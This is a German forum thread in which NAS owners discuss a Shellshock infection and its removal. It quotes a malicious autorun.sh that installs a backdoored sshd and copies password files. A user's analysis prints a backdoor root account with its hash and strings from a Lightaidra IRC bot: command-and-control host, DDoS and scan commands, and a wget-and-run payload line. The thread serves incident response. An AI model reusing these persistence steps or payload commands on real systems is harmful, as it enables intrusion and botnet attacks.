Ich habe meine daten nun noch auf einer weiteren platte gesichert.
Wie kann ich denn als unerfahrener die autorun vorher löschen? Wo finde ich sie denn genau?
[Malware/Virus] Shellshock-Fix 1.0.2 / pnscan
- Smile99
- Erledigt
-
-
Stand zwar weiter oben schon mal, aber hier nochmal für Dich
Codemount -t ext2 /dev/mtdblock5 /tmp/config rm -f /tmp/config/autorun.sh umount /tmp/config -
-
Zitat von "bladekiller"
Hätte das hier auch funktioniert
Nein! Das ist ein anderer Exploit. -
Hallo zusammen,
ich hatte anfang der Woche auch das problem. Komischerweise aber nur Sporadisch. Einmal habe ich den Prozess pnscan gesehen danach nicht mehr. Ich habe eben mal meine Autorun.sh ausgelsen.
Hier das Ergebniss:
Code
Alles anzeigen/share/MD0_DATA/optware/.xpl/.cgi cp /share/MD0_DATA/optware/.xpl/.exo.cgi /home/httpd/cgi-bin/exo.cgi sleep 30 && cp -f /opt/sbin/sshd /usr/sbin/sshd && /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 & sleep 200 && sh /share/MD0_DATA/optware/.xpl/run & cp /etc/resolv.conf /share/MD0_DATA/optware/etc cp /etc/hostname /share/MD0_DATA/optware/etc cp /etc/TZ /share/MD0_DATA/optware/etc cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc rm -rf /opt ln -sf /share/MD0_DATA/optware/opt /opt mount -o bind /dev /share/MD0_DATA/optware/dev mount -o bind /proc /share/MD0_DATA/optware/proc mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb "autorun.sh" 22 lines, 1300 charactersRichtig blöde frage bin ich auch betroffen? Wollte morgen neu Aufsetzen. BIn noch daten am Sichern.
Vielen Dank und viele Grüße
FC -
Hier mal eine "Shellshock Testseite"
Sämtliche Exploits 1-7 ergeben bei Firm 4.1.1 eine "nicht angreifbar" der letzte ... allerdings als Ausgabe eine
Segmentation fault
vulanrablewas nach meinen Shell-Kentnissen auch OK ist, also der erst Anteil des Befehls vor den Pipes gibt das Seg-Fault... hat also nicht funktioniert .... richtig ??
-
Ok alles klar danke
Zitat von "Smile99"Ja, du bist betroffen
Alles was in optware/.xpl drinnen liegt. -
Hallo ich bin es nochmal
Nach gestrigem Formatieren der Platten heute Nas-Recovery und dann Firmware Recovery dann jetzt dieser Eintrag in der Easybox.
Da war das Nas gerade einmal erst ein paar Minuten am Netz..
Code12/13/2014 19:35:50 **Smurf** 221.223.47.0->> 192.168.2.9, Type:3, Code:3 (from PPPoE1 Inbound)Woher weiss jemand das das Nas nun die 192.168.2.9 hat.
Habe ich noch immer das Teil drauf?
-
Hast du noch eine Portweiterleitung in deinem Router?
Ansonsten gibt es aus dem Internet kein Zugriff auf die Geräte in deinem Netzwerk. -
Nein der Router hat keine einzige Portweiterleitung. Zumal er auch eine neue IP bekommen hat. von 10 auf 9.
Auch UPnP am Router ist aus.
-
ich habe heute die Firmware Recovery gemacht und alles neu Aufegesetzt bis jetzt keine anzeichen für pnscan etc...
-
flower1978
Ist auch kein DMZ in dem Router aktiviert? -
Nein DMZ ist aus. Es könnte aber evtl. auch von der automatischen Uhrzeit einstellung gekommen sein. Ansonsten habe ich leider keine erklärung.
Ich werde mich dem aufspielen der Daten daher noch einen Tag warten, und schauen, was so passiert. Gibt es eine Möglichkeit im NAS sämtliche Ein- und Ausgämge zu protokolieren?
-
Unter Systemsteuerung->Systemprotokolle
Dort kannst du die Systemverbindungprotokolle aufzeichnen lassen. -
Zitat von "Drauka"
Stand zwar weiter oben schon mal, aber hier nochmal für Dich
Codemount -t ext2 /dev/mtdblock5 /tmp/config rm -f /tmp/config/autorun.sh umount /tmp/confighallo drauka,
vom qnap-techniker nie eine antwort bekommen....wurst.
wichtiger: wie schon von anderen angesprochen wurde, auch vom dr. mike im englischen forum, ist die rede ständig von der autorun.sh datei. aber mir wurde nie geanwortet, ob es NUR um diese datei geht????
d.h.....vielleicht wurde andere teile des fw-codes korruptiert - oder habe ich was verpasst bzw. überlesen.
gruss vorwärts,
manfred -
Zitat von "MRudy"
oder habe ich was verpasst bzw. überlesen.
Davon gehe ich mal aus.Zitat von "MRudy"auch vom dr. mike im englischen forum,
Glaube ich nicht. Ich habe nur hier darüber geschrieben.
Zitat von "MRudy"d.h.....vielleicht wurde andere teile des fw-codes korruptiert
Jup, so ist es.
- es wird eine Ordnerstruktur /share/MD0_DATA/optware angelegt.Code/share/MD0_DATA/optware//share/MD0_DATA/optware/.xpl//share/MD0_DATA/optware/.xpl/.cgi.1/share/MD0_DATA/optware/.xpl/run/share/MD0_DATA/optware/.xpl/.cgi.3/share/MD0_DATA/optware/.xpl/armgH.cgi/share/MD0_DATA/optware/.xpl/.cgi.4/share/MD0_DATA/optware/.xpl/.cgi.2/share/MD0_DATA/optware/.xpl/.cgi/share/MD0_DATA/optware/.xpl/.exo.cgi/share/MD0_DATA/optware/opt//share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.2/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.13/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.1/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.3/share/MD0_DATA/optware/opt/libexec//share/MD0_DATA/optware/opt/libexec/ssh-pkcs11-helper/share/MD0_DATA/optware/opt/libexec/ssh-keysign/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.4/share/MD0_DATA/optware/opt/share//share/MD0_DATA/optware/opt/share/openssl//share/MD0_DATA/optware/opt/share/openssl/openssl.cnf/share/MD0_DATA/optware/opt/share/ipkg//share/MD0_DATA/optware/opt/share/ipkg/intercept//share/MD0_DATA/optware/opt/share/ipkg/intercept/update-modules/share/MD0_DATA/optware/opt/share/ipkg/intercept/depmod/share/MD0_DATA/optware/opt/share/ipkg/intercept/ldconfig/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.8/share/MD0_DATA/optware/opt/lib//share/MD0_DATA/optware/opt/lib/libipkg.so/share/MD0_DATA/optware/opt/lib/libcrypto.so.0.9.7/share/MD0_DATA/optware/opt/lib/libz.so.1/share/MD0_DATA/optware/opt/lib/libz.so/share/MD0_DATA/optware/opt/lib/libcrypto.so.0/share/MD0_DATA/optware/opt/lib/libcrypto.so/share/MD0_DATA/optware/opt/lib/libz.so.1.2.5/share/MD0_DATA/optware/opt/lib/libssl.so/share/MD0_DATA/optware/opt/lib/libipkg.so.0/share/MD0_DATA/optware/opt/lib/libssl.so.0.9.7/share/MD0_DATA/optware/opt/lib/libssl.so.0/share/MD0_DATA/optware/opt/lib/ipkg//share/MD0_DATA/optware/opt/lib/ipkg/lists//share/MD0_DATA/optware/opt/lib/ipkg/lists/cs05q3armel/share/MD0_DATA/optware/opt/lib/ipkg/info//share/MD0_DATA/optware/opt/lib/ipkg/info/zlib.control/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.postinst/share/MD0_DATA/optware/opt/lib/ipkg/info/zlib.list/share/MD0_DATA/optware/opt/lib/ipkg/info/openssl.control/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.list/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.conffiles/share/MD0_DATA/optware/opt/lib/ipkg/info/openssl.list/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.prerm/share/MD0_DATA/optware/opt/lib/ipkg/info/openssl.conffiles/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.control/share/MD0_DATA/optware/opt/lib/ipkg/alternatives//share/MD0_DATA/optware/opt/lib/ipkg/alternatives/scp/share/MD0_DATA/optware/opt/lib/ipkg/alternatives/ssh/share/MD0_DATA/optware/opt/lib/libipkg.so.0.0.0/share/MD0_DATA/optware/opt/var//share/MD0_DATA/optware/opt/var/run//share/MD0_DATA/optware/opt/var/empty//share/MD0_DATA/optware/opt/ipkg-xJfCkD//share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.11/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.7/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.5/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.12/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.9/share/MD0_DATA/optware/opt/nasconfig_fs.img.tgz/share/MD0_DATA/optware/opt/etc//share/MD0_DATA/optware/opt/etc/default//share/MD0_DATA/optware/opt/etc/default/openssh/share/MD0_DATA/optware/opt/etc/ipkg.conf/share/MD0_DATA/optware/opt/etc/openssh//share/MD0_DATA/optware/opt/etc/openssh/ssh_config/share/MD0_DATA/optware/opt/etc/openssh/moduli/share/MD0_DATA/optware/opt/etc/openssh/sshd_config/share/MD0_DATA/optware/opt/etc/init.d//share/MD0_DATA/optware/opt/etc/init.d/S40sshd/share/MD0_DATA/optware/opt/sbin//share/MD0_DATA/optware/opt/sbin/sshd/share/MD0_DATA/optware/opt/bin//share/MD0_DATA/optware/opt/bin/slogin/share/MD0_DATA/optware/opt/bin/ssh-keygen/share/MD0_DATA/optware/opt/bin/openssl/share/MD0_DATA/optware/opt/bin/ssh-add/share/MD0_DATA/optware/opt/bin/openssh-scp/share/MD0_DATA/optware/opt/bin/ipkg-opt/share/MD0_DATA/optware/opt/bin/update-alternatives/share/MD0_DATA/optware/opt/bin/scp/share/MD0_DATA/optware/opt/bin/ssh-agent/share/MD0_DATA/optware/opt/bin/openssh-ssh/share/MD0_DATA/optware/opt/bin/sftp/share/MD0_DATA/optware/opt/bin/ipkg/share/MD0_DATA/optware/opt/bin/ssh-keyscan/share/MD0_DATA/optware/opt/bin/ssh/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk/share/MD0_DATA/optware/opt/include//share/MD0_DATA/optware/opt/include/zconf.h/share/MD0_DATA/optware/opt/include/zlib.h/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.10/share/MD0_DATA/optware/opt/ipkg-2PtqiL//share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.6/share/MD0_DATA/optware/etc/share/MD0_DATA/optware/ipkglib//share/MD0_DATA/optware/ipkglib/ipkglib
- es wird eine Datei ipkg in /usr/bin angelegtCodell /usr/bin/ipkg-rwxrwxrwx 1 admin administ 164 Dec 7 22:29 ipkg*
- es wird die originale sshd durch eine modifizierte in /usr/sbin ausgetauscht.
OriginalCodell /usr/sbin/sshd-rwxr-xr-x 1 admin administ 414.7k Jul 26 2013 sshd*
ModifiziertCodell /usr/sbin/sshd-rwxr-xr-x 1 admin administ 351.5k Dec 7 23:10 sshd*
- es wird ein neuer User 'request' in /etc/config/passwd und /etc/config/shadow angelegt
passwdCoderequest:x:0:0:request:/share/homes/admin:/bin/sh
shadowCoderequest:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::
- es wird eine Datei exo.cgi aus der Optwarestruktur nach /home/httpd/cgi-bin/ kopiert
Lesbarer Text in dieser Datei:Code
Alles anzeigen[MS] 0ab1cd2ef3gh4il5mn6op7qr8st9uvz_wyjkx irc.pollo.org 192.79.153.207:6667 /var/run/.lightpid #aidra NICK %s USER pwn localhost localhost :Lightaidra ;) TOPIC %s NICK %s PRIVMSG %s :* .exec <commands> - execute a system command PRIVMSG %s :* .version - show the current version of bot PRIVMSG %s :* .status - show the status of bot PRIVMSG %s :* .help - show this help message PRIVMSG %s :* *** Scan Commands PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug PRIVMSG %s :* .stop - stop current operation (scan/dos) PRIVMSG %s :* *** DDos Commands: PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing, PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86 PRIVMSG %s :* .spoof <ip> - set the source address ip spoof PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation) PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation) PRIVMSG %s :* *** IRC Commands: PRIVMSG %s :* .setchan <channel> - set new master channel PRIVMSG %s :* .join <channel> <password> - join bot in selected room PRIVMSG %s :* .part <channel> - part bot from selected room PRIVMSG %s :* .quit - kill the current process PRIVMSG %s :* *** EOF Aidra?! QUIT :pwn! synflood packeting %s:%u (secs: %u) PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u). ngsynflood packeting %s:%u (secs: %u) PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u). ackflood packeting %s:%u (secs: %u) PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u). ngackflood packeting %s:%u (secs: %u) PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u). /var/run/.lightscan PRIVMSG %s :[error] unable to open: %s QUOTE ZOMBIE %s.%s.%d.%d %16s POST /cgi-bin/firmwarecfg HTTP/1.1 Host: $IP password> password root rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh& PRIVMSG %s :[nsynflood] packeting completed! QUOTE ZOMBIE PRIVMSG %s :[ngsynflood] packeting completed! PRIVMSG %s :[ackflood] packeting completed! PRIVMSG %s :[ngackflood] packeting completed! 0.9.30 /bin/sh (nil) (null) hlLjztqZ npxXoudifFeEgGaACScs +0-#'I !''-N.Y]Z #$%&'()*+,234567 ;<=>?@ABCDEFGJIMOPQRSTUVWX[abcxyz{|}~ Unknown error Success Cannot register service xdr_array: out of memory 0123456789abcdef /etc/hosts /etc/config/hosts %s%s%m RPC: (unknown error code) 3.09Das sind die Dinge, die ich bisher herausfinden konnte. Vermutlich ist das noch nicht alles.
-
Respekt - tolle Analyse :thumb:
-
Vielen Dank dr_mike! :thumb:
-
Menno, du hast echt was drauf.
Da hast du dir aber echt viel arbeit gemacht.....